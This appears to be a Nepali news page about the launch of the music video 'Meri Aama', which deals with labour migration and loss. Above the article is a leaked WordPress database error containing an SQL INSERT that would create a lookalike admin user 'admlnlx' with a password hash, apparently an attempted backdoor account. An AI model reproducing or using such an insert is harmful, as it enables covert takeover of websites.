WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp1JUqyXYHqoC26hU3C0aAacNuc.Mx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:06:53', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । दुर्लभ जन्तरेको ‘मेरी आमा’ बोलको म्युजिक भिडियो सार्वजनिक भएको छ ।
शुक्रबार काठमाण्डौमा एक कार्यक्रम बीच ‘मेरी आमा’ गीतको म्युजिक भिडियो सरजनिक गरिएको हो ।
गीतमा दुर्लभ जन्तरेको शब्द, टेक नाछिरिङको संगीत, कृष्ण भक्त राईको संगीत सम्योजन र अभिषेक राईको स्वर रहेको छ ।
गरिबीले लाखौ नेपालीलाई वैदेशिक रोजगारीमा जान वाध्य पारीएको पिडालाई ‘मेरी आमा’ म्युजिक भिडियोमा कलात्मक रुपमा प्रश्तुत गरिएको छ ।
धन कमाएर साहूको ऋण तिर्न विदेशीएका छोराले फर्किदा आमालाई जिउँदो भेट्न नपाएको नेपाली समाजको एउटा मार्मिक कथालाई गीत र भिडियोले बोलेको छ ।
म्युजिक भिडियोमा कबिता आलेमगर, जीवन राई, टेक नाछिरिङ्ग, तिर्सना राई, लक्षमण मिसन कार्की र भक्त कुमार राइइले फिचरिङ्ग गरेका छन भने दुर्लभ जन्तरेको स्क्रिप्ट/निर्देशन दुर्गा बान्तवाको छायाङकन र मिङ्मा शेर्पाको सम्पादन रहेको छ ।
म्युजिक भिडियो सार्वजनिक कार्यक्रममा बरीष्ठ गायीका तथा अभिनेत्री कबिता आले, गायक तथा सगीतकार अशोक मुकारुङ, डि एस पि कुलचन्द्र नेपाल, रम्तेल इन्टरनेशनल एजुकेशन इङलिश स्कुलका प्रिन्शिपल शक्ती नेपालले शुभकामना मन्तब्या राख्नुभएको थियो ।